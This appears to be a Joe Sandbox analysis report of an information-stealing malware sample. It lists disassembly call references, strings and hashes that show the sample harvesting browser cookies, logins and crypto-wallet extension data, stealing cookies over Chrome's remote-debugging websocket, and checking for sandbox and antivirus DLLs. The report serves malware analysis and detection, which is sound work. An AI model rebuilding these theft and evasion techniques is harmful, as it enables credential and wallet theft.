                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,?,?,GET ,00000000,00420ACE,00000001), ref: 00405C38
                                                                                                                                                                                                                                                                                                  • closesocket.WS2_32(?), ref: 00405C45
                                                                                                                                                                                                                                                                                                  • WSACleanup.WS2_32 ref: 00405C4B
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405CC2
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405D29
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405D95
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405DFC
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE), ref: 00405E6D
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE), ref: 00405EE6
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405F75
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405FE3
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 0040604B
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 004060AD
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 0040610F
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00406171
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 004061D9
                                                                                                                                                                                                                                                                                                  • send.WS2_32(00000000,00000000,?,00000000), ref: 0040620B
                                                                                                                                                                                                                                                                                                  • recv.WS2_32(00000000,?,00001000,00000000), ref: 0040622A
                                                                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 00406246
                                                                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 00406252
                                                                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 0040625E
                                                                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 0040626A
                                                                                                                                                                                                                                                                                                  • closesocket.WS2_32(00000000), ref: 004062E7
                                                                                                                                                                                                                                                                                                  • WSACleanup.WS2_32 ref: 004062ED
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406B00: memcpy.MSVCRT(00000000,?,?,00000000,?,?,?,00000000,?,?,?,00406742,00000088,0042150A,00000000,?), ref: 00406B7A
                                                                                                                                                                                                                                                                                                  • send.WS2_32(00000000,00000000,00000000,00000000), ref: 004063F3
                                                                                                                                                                                                                                                                                                  • recv.WS2_32(00000000,00000000,00001000,00000000), ref: 00406465
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,00000000,00000000), ref: 004064A3
                                                                                                                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(?), ref: 004065BF
                                                                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(0042150A,00000000,?,00000000,00000005), ref: 0040671B
                                                                                                                                                                                                                                                                                                  • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00406763
                                                                                                                                                                                                                                                                                                  • closesocket.WS2_32(00000000), ref: 0040676A
                                                                                                                                                                                                                                                                                                  • WSACleanup.WS2_32 ref: 00406770
                                                                                                                                                                                                                                                                                                  • closesocket.WS2_32(00000000), ref: 004067C8
                                                                                                                                                                                                                                                                                                  • WSACleanup.WS2_32 ref: 004067CE
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040683D
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 00406894
                                                                                                                                                                                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0040692E
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Sec-WebSocket-Version: 13, xrefs: 00405EB3
                                                                                                                                                                                                                                                                                                  • GET , xrefs: 00405BFC
                                                                                                                                                                                                                                                                                                  • Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: , xrefs: 00405DCF
                                                                                                                                                                                                                                                                                                  • {"id":1,"method":"Storage.getCookies"}, xrefs: 0040623C
                                                                                                                                                                                                                                                                                                  • ws://, xrefs: 0040558E
                                                                                                                                                                                                                                                                                                  • HTTP/1.1Host: , xrefs: 00405C0B
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ??3@$memcpy$Cleanupclosesocket$rand$memmovesend$memchrrecv$??2@Concurrency::cancel_current_taskStartup_invalid_parameter_noinfo_noreturnconnectfreeaddrinfogetaddrinfohtonsmemcmpsocket
                                                                                                                                                                                                                                                                                                  • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $GET $ws://${"id":1,"method":"Storage.getCookies"}

Control-flow Graph

[Figure: control_flow_graph 827 (first block 4081b0-408273); legend: Executed, Not Executed]
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104), ref: 004081D9
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410240: lstrlenA.KERNEL32(?,?,?,00417367,0042150A,0042150A,?,?,?,?,00418606), ref: 00410249
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410240: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,?,00418606), ref: 0041027A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,0042150A,0042150A,?,?,0042119A,?,?,0042150A,?), ref: 00408268
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,77355E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 00408311
                                                                                                                                                                                                                                                                                                  • memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00408344
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040839B
                                                                                                                                                                                                                                                                                                  • memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 004083CC
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,0042113D,00000002,?,?,?,00000001), ref: 0040842F
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$lstrcatlstrlenmemcmpstrlen$??3@EnvironmentExpandFileFindFirstStringsmemmove
                                                                                                                                                                                                                                                                                                  • String ID: --remote-debugging-port=9223 --profile-directory="$Brave$C:\ProgramData\$CURRENT$Cookies$History$IndexedDB$Local Extension Settings$Login Data$Network$Opera$Opera Crypto$Opera GX$Sync Extension Settings$Wallets$Web Data$\BraveWallet\Preferences$_0.indexeddb.leveldb$_cookies.db$_formhistory.db$_history.db$_key4.db$_logins.json$_webdata.db$chrome-extension_$cookies.sqlite$formhistory.sqlite$places.sqlite

Control-flow Graph

[Figure: control_flow_graph 2248 (first block 413ff0-41405d); legend: Executed, Not Executed]
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00414012
                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?,-000000C0,-000000CC,-000000D8), ref: 00414023
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00414039
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0041404F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,77355E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 004140E5
                                                                                                                                                                                                                                                                                                  • memcmp.MSVCRT(?,00000000,00000000), ref: 0041412B
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 00414197
                                                                                                                                                                                                                                                                                                  • memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002), ref: 004141D4
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,0042113D,00000002), ref: 0041423D
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memcmpmemsetstrlen$??3@FileFindFirstmemmovewsprintf
                                                                                                                                                                                                                                                                                                  • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$%s\%s\%s$%s\*.*$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*$C:\ProgramData\$Files
                                                                                                                                                                                                                                                                                                  • API String ID: 330858031-1484801792
                                                                                                                                                                                                                                                                                                  • Opcode ID: 36e3530557f26695959d15d3286dd14327cc8fd271dfcdd65ad83458a501a66f
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5e360f460fbcca21e162eb574f6fd90f09ecfb201c8315115846ffce7b56cf4e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 36e3530557f26695959d15d3286dd14327cc8fd271dfcdd65ad83458a501a66f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB42D471E00618ABDB10DF65CC85BEEB7B4BF58304F00419AF915A7252EB78AAC4CF94

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00414BEE
                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00414BFF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,77355E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 00414CA9
                                                                                                                                                                                                                                                                                                  • memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00414CEB
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 00414D57
                                                                                                                                                                                                                                                                                                  • memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 00414D94
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,0042113D,00000002,?,?,?,00000001), ref: 00414DFD
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
Similarity
• API ID: memcmpstrlen$??3@FileFindFirstmemmovewsprintf
• String ID: %s\%s$Soft$Software\Valve\Steam$SteamPath$\Steam\$\config\
• API String ID: 3353021899-493467598

Control-flow Graph (graph rendering not preserved; first block 407060-407087)
APIs
• strlen.MSVCRT ref: 0040708A
  • Part of subcall function 0040ECA0: memcpy.MSVCRT(?,00000010,?,?,?,00000010,00406A4D,00000001,00000000,?,?,00000000,00000000,00000000,?,0040D83E), ref: 0040ECC1
  • Part of subcall function 0040ECA0: ??3@YAXPAX@Z.MSVCRT(00000010,?,?,00000010,00406A4D,00000001,00000000,?,?,00000000,00000000,00000000,?,0040D83E,00000000,?), ref: 0040ECF3
• strlen.MSVCRT ref: 004070EB
• memcpy.MSVCRT(?,ChromeBuildTools,00000104), ref: 00407130
• OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00407142
• CreateDesktopA.USER32 ref: 00407166
• lstrcpyA.KERNEL32(?,00000000,?,OCALAPPDATA,00000000,?,0000001C), ref: 004071BD
• strlen.MSVCRT ref: 00407222
• Sleep.KERNEL32(000003E8,00000000,00000000,?,00000000,?), ref: 0040725B
Memory Dump Source
• Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: strlen$Desktopmemcpy$??3@CreateOpenSleeplstrcpy
• String ID: %s%s"$ChromeBuildTools$D$OCALAPPDATA$_CreateProcess$cookies$1#v
• API String ID: 509579932-922304637

Control-flow Graph (graph rendering not preserved; first block 401730-401765)
APIs
  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
• FindFirstFileA.KERNEL32(00000000,00000028,00000028,00000028,P#@,?,00420BBE,?,?,?,00420BBE,P#@,?,00000028,00000028,?), ref: 004018D4
• strlen.MSVCRT ref: 00401970
Memory Dump Source
• Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FileFindFirstlstrcpystrlen
                                                                                                                                                                                                                                                                                                  • String ID: C:\ProgramData\$P#@$P#@$Wallets$\*.*
                                                                                                                                                                                                                                                                                                  • API String ID: 2655114730-2645412951
                                                                                                                                                                                                                                                                                                  • Opcode ID: 098bd10a0f2ace822b4f538e927eeff24fd1bc9f0dc77ec90ac93b3d6e4b1d5a
                                                                                                                                                                                                                                                                                                  • Instruction ID: f6b8f89bdbb38ad25dbe9b200cedc7393f8838c2c48d913623183ff2efa6fcc7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 098bd10a0f2ace822b4f538e927eeff24fd1bc9f0dc77ec90ac93b3d6e4b1d5a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C572B931A102185BCF14EBA1CD959EEB779AF44304F40409EF9066B192DF7CAEC5CBA9
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,?,?,\*.*,?,?,0042150A), ref: 0040A63D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,77355E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040A738
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlenmemmovestrlen
                                                                                                                                                                                                                                                                                                  • String ID: C:\ProgramData\$CURRENT$IndexedDB$Local Extension Settings$Opera$Plugins$Sync Extension Settings$Wallets$\*.*$_0.indexeddb.leveldb$chrome-extension_
                                                                                                                                                                                                                                                                                                  • API String ID: 1425610001-450108884
                                                                                                                                                                                                                                                                                                  • Opcode ID: 139ffd1411e68c882e5f60f44f434026bf7f517aa634323aadea9402351866cf
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1a3cb996083095315d2ff66196e58a8cf7e0966e26cbd8d21691459e5d96898c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 139ffd1411e68c882e5f60f44f434026bf7f517aa634323aadea9402351866cf
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 841243316102589BCB14EBA1CD95AEE7779AF54308F40009EF5066B182DFBC6EC5CBA9
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,?,?,0042119A,?,?,0042150A), ref: 0040C80A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,77355E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040C893
                                                                                                                                                                                                                                                                                                  • memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 0040C8C2
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040C91D
                                                                                                                                                                                                                                                                                                  • memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 0040C94B
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,0042113D,00000002,?,?,?,00000001), ref: 0040C9AE
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$lstrcatmemcmpstrlen$??3@FileFindFirstlstrlenmemmove
                                                                                                                                                                                                                                                                                                  • String ID: C:\ProgramData\$\..\$prefs.js$profiles.ini
                                                                                                                                                                                                                                                                                                  • API String ID: 3809920955-2608480989
                                                                                                                                                                                                                                                                                                  • Opcode ID: b82d6e280c7ec2f173d30f79c5aac1989165e53126787770b6279d5565a2d5f3
                                                                                                                                                                                                                                                                                                  • Instruction ID: 416ba331a07f3905739cc071a47e34269f16b80876d8e7813359335a266a51ee
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b82d6e280c7ec2f173d30f79c5aac1989165e53126787770b6279d5565a2d5f3
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4932D7319002189BCB14EBB1C9D5AEEB778BF48304F40455EF41667192DF7CAAC9CBA9
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FileFindstrcpy$strlenwsprintf$CloseFirstFolderNextOperationPath_splitpathisupper
                                                                                                                                                                                                                                                                                                  • String ID: %s\%s$%s\*$.
                                                                                                                                                                                                                                                                                                  • API String ID: 3519957579-2663966076
                                                                                                                                                                                                                                                                                                  • Opcode ID: cf9b2e7014ef6816a469ec533b7518abd9e477652080199a49752e259d229905
                                                                                                                                                                                                                                                                                                  • Instruction ID: 114bed65e9d4b9d73eb4094e4860af952423d6fe10318c0fdbdbb5acdc2bd80f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cf9b2e7014ef6816a469ec533b7518abd9e477652080199a49752e259d229905
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8413B71908348AFD2209B21DC05BEB77BCAFD5304F04452EF99982251E779A689C7AB
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,avghookx.dll,?,?,?,004185FC), ref: 0040121E
                                                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,avghooka.dll,?,?,?,004185FC), ref: 0040124E
                                                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,snxhk.dll,?,?,?,004185FC), ref: 0040127E
                                                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,sbiedll.dll,?,?,?,004185FC), ref: 004012AE
                                                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,api_log.dll,?,?,?,004185FC), ref: 004012DE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004011B0: lstrcmpiW.KERNEL32(?,?,7622F360,?,?,?,00401320,pstorec.dll,?,?,?,004185FC), ref: 004011DA
                                                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,dir_watch.dll,?,?,?,004185FC), ref: 0040130E
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcmpi
                                                                                                                                                                                                                                                                                                  • String ID: api_log.dll$avghooka.dll$avghookx.dll$cmdvrt32.dll$cmdvrt64.dll$dir_watch.dll$pstorec.dll$sbiedll.dll$snxhk.dll$vmcheck.dll$wpespy.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 1586166983-3272603366
                                                                                                                                                                                                                                                                                                  • Opcode ID: b3d858f19f8d577d2ca6532e9e1bf2584ef083a26a7cebbf2994b5fa81393a97
                                                                                                                                                                                                                                                                                                  • Instruction ID: 41c0b1b83a52b27a2bdfeff9d3ed397a321de4e9cb8fcf5d4a551c39b82ef4d0
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b3d858f19f8d577d2ca6532e9e1bf2584ef083a26a7cebbf2994b5fa81393a97
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D431AD323413509BCB119B05C8C0F253362AF99B98FAE01F6E902BB7B7D27C9C41865D
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004042B3,00416A04,?,?,00416A04), ref: 004028AB
